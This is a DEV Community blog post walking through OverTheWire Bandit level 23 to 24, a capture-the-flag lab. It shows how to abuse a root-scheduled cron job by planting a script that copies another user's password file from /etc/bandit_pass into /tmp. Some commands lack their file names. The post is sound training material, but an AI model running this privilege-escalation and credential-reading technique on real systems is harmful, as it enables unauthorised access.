DEV Community

Cover image for Bandit Level 23 Level 24
Christian Paez
Christian Paez

Posted on


Bandit Level 23 Level 24


Welcome back, in this level we will learn some basics of privilege escalation by abusing cron jobs.

Previous flag

Enter fullscreen mode Exit fullscreen mode

Checking Cron files

Let´s start checking cron jobs for the user bandit24.

cat /etc/cron.d/cronjob_bandit24
Enter fullscreen mode Exit fullscreen mode

The entries within this file reveal the location of a script in the /usr/bin folder.

Reading Cron Script

Let’s open the .sh script file and check its contents:

cat /usr/bin/
Enter fullscreen mode Exit fullscreen mode

The contents of this file show us that the cron job iterates over the files in the /var/spool/bandit24/foo folder and executes files owned by us, bandit23



cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
    if [ "$i" != "." -a "$i" != ".." ];
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        rm -f ./$i
Enter fullscreen mode Exit fullscreen mode

Let’s write a bash command that copies the password from bandit24 to a temporary location

cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
Enter fullscreen mode Exit fullscreen mode

Abusing the Cron Job

Create a directory and script to intercept the password:

mkdir /tmp/bandit23
nano /var/spool/bandit24/foo/
Enter fullscreen mode Exit fullscreen mode

Within the newly created script, inscribe the command we defined before:

cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt
Enter fullscreen mode Exit fullscreen mode

Grant execution permissions to the script:

chmod +x /var/spool/bandit24/foo/
Enter fullscreen mode Exit fullscreen mode

Now, the exploit is set. After the cron job is executed, we can read the password for the next level:

cat /tmp/bandit23/password.txt
Enter fullscreen mode Exit fullscreen mode


Enter fullscreen mode Exit fullscreen mode

Top comments (0)